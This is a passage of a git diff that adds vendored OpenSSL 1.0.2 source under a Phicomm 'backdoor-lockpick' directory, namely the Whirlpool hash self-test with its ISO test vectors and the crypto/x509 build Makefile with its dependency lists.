+    0xB7, 0xCB, 0x57, 0x21, 0x1B, 0x92, 0x81, 0xA6,
+    0x55, 0x17, 0xCC, 0x87, 0x9D, 0x7B, 0x96, 0x21,
+    0x42, 0xC6, 0x5F, 0x5A, 0x7A, 0xF0, 0x14, 0x67
+};
+
+unsigned char iso_test_7[WHIRLPOOL_DIGEST_LENGTH] = {
+    0x46, 0x6E, 0xF1, 0x8B, 0xAB, 0xB0, 0x15, 0x4D,
+    0x25, 0xB9, 0xD3, 0x8A, 0x64, 0x14, 0xF5, 0xC0,
+    0x87, 0x84, 0x37, 0x2B, 0xCC, 0xB2, 0x04, 0xD6,
+    0x54, 0x9C, 0x4A, 0xFA, 0xDB, 0x60, 0x14, 0x29,
+    0x4D, 0x5B, 0xD8, 0xDF, 0x2A, 0x6C, 0x44, 0xE5,
+    0x38, 0xCD, 0x04, 0x7B, 0x26, 0x81, 0xA5, 0x1A,
+    0x2C, 0x60, 0x48, 0x1E, 0x88, 0xC5, 0xA2, 0x0B,
+    0x2C, 0x2A, 0x80, 0xCF, 0x3A, 0x9A, 0x08, 0x3B
+};
+
+unsigned char iso_test_8[WHIRLPOOL_DIGEST_LENGTH] = {
+    0x2A, 0x98, 0x7E, 0xA4, 0x0F, 0x91, 0x70, 0x61,
+    0xF5, 0xD6, 0xF0, 0xA0, 0xE4, 0x64, 0x4F, 0x48,
+    0x8A, 0x7A, 0x5A, 0x52, 0xDE, 0xEE, 0x65, 0x62,
+    0x07, 0xC5, 0x62, 0xF9, 0x88, 0xE9, 0x5C, 0x69,
+    0x16, 0xBD, 0xC8, 0x03, 0x1B, 0xC5, 0xBE, 0x1B,
+    0x7B, 0x94, 0x76, 0x39, 0xFE, 0x05, 0x0B, 0x56,
+    0x93, 0x9B, 0xAA, 0xA0, 0xAD, 0xFF, 0x9A, 0xE6,
+    0x74, 0x5B, 0x7B, 0x18, 0x1C, 0x3B, 0xE3, 0xFD
+};
+
+unsigned char iso_test_9[WHIRLPOOL_DIGEST_LENGTH] = {
+    0x0C, 0x99, 0x00, 0x5B, 0xEB, 0x57, 0xEF, 0xF5,
+    0x0A, 0x7C, 0xF0, 0x05, 0x56, 0x0D, 0xDF, 0x5D,
+    0x29, 0x05, 0x7F, 0xD8, 0x6B, 0x20, 0xBF, 0xD6,
+    0x2D, 0xEC, 0xA0, 0xF1, 0xCC, 0xEA, 0x4A, 0xF5,
+    0x1F, 0xC1, 0x54, 0x90, 0xED, 0xDC, 0x47, 0xAF,
+    0x32, 0xBB, 0x2B, 0x66, 0xC3, 0x4F, 0xF9, 0xAD,
+    0x8C, 0x60, 0x08, 0xAD, 0x67, 0x7F, 0x77, 0x12,
+    0x69, 0x53, 0xB2, 0x26, 0xE4, 0xED, 0x8B, 0x01
+};
+
+int main(int argc, char *argv[])
+{
+    unsigned char md[WHIRLPOOL_DIGEST_LENGTH];
+    int i;
+    WHIRLPOOL_CTX ctx;
+
+# ifdef OPENSSL_IA32_SSE2
+    /*
+     * Alternative to this is to call OpenSSL_add_all_algorithms... The below
+     * code is retained exclusively for debugging purposes.
+     */
+    {
+        char *env;
+
+        if ((env = getenv("OPENSSL_ia32cap")))
+            OPENSSL_ia32cap = strtoul(env, NULL, 0);
+    }
+# endif
+
+    fprintf(stdout, "Testing Whirlpool ");
+
+    WHIRLPOOL("", 0, md);
+    if (memcmp(md, iso_test_1, sizeof(iso_test_1))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 1 of 9 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    WHIRLPOOL("a", 1, md);
+    if (memcmp(md, iso_test_2, sizeof(iso_test_2))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 2 of 9 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    WHIRLPOOL("abc", 3, md);
+    if (memcmp(md, iso_test_3, sizeof(iso_test_3))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 3 of 9 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    WHIRLPOOL("message digest", 14, md);
+    if (memcmp(md, iso_test_4, sizeof(iso_test_4))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 4 of 9 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    WHIRLPOOL("abcdefghijklmnopqrstuvwxyz", 26, md);
+    if (memcmp(md, iso_test_5, sizeof(iso_test_5))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 5 of 9 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    WHIRLPOOL("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+              "abcdefghijklmnopqrstuvwxyz" "0123456789", 62, md);
+    if (memcmp(md, iso_test_6, sizeof(iso_test_6))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 6 of 9 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    WHIRLPOOL("1234567890" "1234567890" "1234567890" "1234567890"
+              "1234567890" "1234567890" "1234567890" "1234567890", 80, md);
+    if (memcmp(md, iso_test_7, sizeof(iso_test_7))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 7 of 9 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    WHIRLPOOL("abcdbcdecdefdefgefghfghighijhijk", 32, md);
+    if (memcmp(md, iso_test_8, sizeof(iso_test_8))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 8 of 9 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    WHIRLPOOL_Init(&ctx);
+    for (i = 0; i < 1000000; i += 288)
+        WHIRLPOOL_Update(&ctx, "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa",
+                         (1000000 - i) < 288 ? 1000000 - i : 288);
+    WHIRLPOOL_Final(md, &ctx);
+    if (memcmp(md, iso_test_9, sizeof(iso_test_9))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 9 of 9 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    fprintf(stdout, " passed.\n");
+    fflush(stdout);
+
+    return 0;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/Makefile
new file mode 100644
index 0000000..9ee3641
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/Makefile
@@ -0,0 +1,370 @@
+#
+# OpenSSL/crypto/x509/Makefile
+#
+
+DIR=	x509
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	x509_def.c x509_d2.c x509_r2x.c x509_cmp.c \
+	x509_obj.c x509_req.c x509spki.c x509_vfy.c \
+	x509_set.c x509cset.c x509rset.c x509_err.c \
+	x509name.c x509_v3.c x509_ext.c x509_att.c \
+	x509type.c x509_lu.c x_all.c x509_txt.c \
+	x509_trs.c by_file.c by_dir.c x509_vpm.c
+LIBOBJ= x509_def.o x509_d2.o x509_r2x.o x509_cmp.o \
+	x509_obj.o x509_req.o x509spki.o x509_vfy.o \
+	x509_set.o x509cset.o x509rset.o x509_err.o \
+	x509name.o x509_v3.o x509_ext.o x509_att.o \
+	x509type.o x509_lu.o x_all.o x509_txt.o \
+	x509_trs.o by_file.o by_dir.o x509_vpm.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= x509.h x509_vfy.h
+HEADER=	$(EXHEADER) vpm_int.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+by_dir.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+by_dir.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+by_dir.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+by_dir.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+by_dir.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+by_dir.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+by_dir.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+by_dir.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+by_dir.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+by_dir.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+by_dir.o: ../cryptlib.h by_dir.c
+by_file.o: ../../e_os.h ../../include/openssl/asn1.h
+by_file.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+by_file.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+by_file.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+by_file.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+by_file.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+by_file.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+by_file.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+by_file.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+by_file.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+by_file.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+by_file.o: ../../include/openssl/x509_vfy.h ../cryptlib.h by_file.c
+x509_att.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_att.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_att.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_att.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_att.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_att.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_att.o: ../../include/openssl/opensslconf.h
+x509_att.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_att.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_att.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_att.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_att.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_att.o: ../cryptlib.h x509_att.c
+x509_cmp.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_cmp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_cmp.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_cmp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_cmp.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_cmp.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_cmp.o: ../../include/openssl/opensslconf.h
+x509_cmp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_cmp.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_cmp.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_cmp.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_cmp.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_cmp.o: ../cryptlib.h x509_cmp.c
+x509_d2.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_d2.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_d2.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_d2.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_d2.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_d2.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_d2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_d2.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_d2.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_d2.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_d2.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_d2.c
+x509_def.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_def.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_def.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_def.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_def.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_def.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_def.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_def.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_def.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_def.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_def.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_def.c
+x509_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+x509_err.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x509_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_err.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_err.o: ../../include/openssl/opensslconf.h
+x509_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_err.o: ../../include/openssl/x509_vfy.h x509_err.c
+x509_ext.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_ext.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_ext.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_ext.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_ext.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_ext.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_ext.o: ../../include/openssl/opensslconf.h
+x509_ext.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_ext.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_ext.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_ext.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_ext.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_ext.o: ../cryptlib.h x509_ext.c
+x509_lu.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_lu.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_lu.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_lu.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_lu.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_lu.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_lu.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x509_lu.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x509_lu.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x509_lu.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x509_lu.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x509_lu.o: ../../include/openssl/x509v3.h ../cryptlib.h x509_lu.c
+x509_obj.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_obj.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_obj.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_obj.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_obj.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_obj.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_obj.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_obj.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_obj.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_obj.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_obj.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_obj.c
+x509_r2x.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_r2x.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+x509_r2x.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x509_r2x.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_r2x.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_r2x.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_r2x.o: ../../include/openssl/opensslconf.h
+x509_r2x.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_r2x.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_r2x.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_r2x.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_r2x.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_r2x.c
+x509_req.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_req.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x509_req.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+x509_req.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_req.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_req.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_req.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_req.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_req.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+x509_req.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_req.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_req.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_req.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_req.c
+x509_set.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_set.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_set.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_set.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_set.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_set.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_set.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_set.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_set.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_set.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_set.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_set.c
+x509_trs.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_trs.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_trs.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_trs.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_trs.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_trs.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_trs.o: ../../include/openssl/opensslconf.h
+x509_trs.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_trs.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_trs.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_trs.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_trs.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_trs.o: ../cryptlib.h x509_trs.c
+x509_txt.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_txt.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_txt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_txt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_txt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_txt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_txt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_txt.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_txt.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_txt.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_txt.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_txt.c
+x509_v3.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_v3.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_v3.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_v3.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_v3.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_v3.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_v3.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x509_v3.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x509_v3.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x509_v3.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x509_v3.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x509_v3.o: ../../include/openssl/x509v3.h ../cryptlib.h x509_v3.c
+x509_vfy.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_vfy.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_vfy.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_vfy.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_vfy.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_vfy.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_vfy.o: ../../include/openssl/opensslconf.h
+x509_vfy.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_vfy.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_vfy.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_vfy.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_vfy.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_vfy.o: ../cryptlib.h vpm_int.h x509_vfy.c
+x509_vpm.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_vpm.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_vpm.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_vpm.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_vpm.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_vpm.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_vpm.o: ../../include/openssl/opensslconf.h
+x509_vpm.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_vpm.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_vpm.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_vpm.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_vpm.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_vpm.o: ../cryptlib.h vpm_int.h x509_vpm.c
+x509cset.o: ../../e_os.h ../../include/openssl/asn1.h
+x509cset.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509cset.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509cset.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509cset.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509cset.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509cset.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509cset.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509cset.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509cset.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509cset.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509cset.c
+x509name.o: ../../e_os.h ../../include/openssl/asn1.h
+x509name.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509name.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509name.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509name.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509name.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509name.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509name.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509name.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509name.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509name.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509name.c
+x509rset.o: ../../e_os.h ../../include/openssl/asn1.h
+x509rset.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509rset.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509rset.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509rset.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509rset.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509rset.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509rset.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509rset.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509rset.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509rset.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509rset.c
+x509spki.o: ../../e_os.h ../../include/openssl/asn1.h
+x509spki.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509spki.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509spki.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509spki.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509spki.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509spki.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509spki.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509spki.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509spki.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509spki.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509spki.c
+x509type.o: ../../e_os.h ../../include/openssl/asn1.h
+x509type.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509type.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
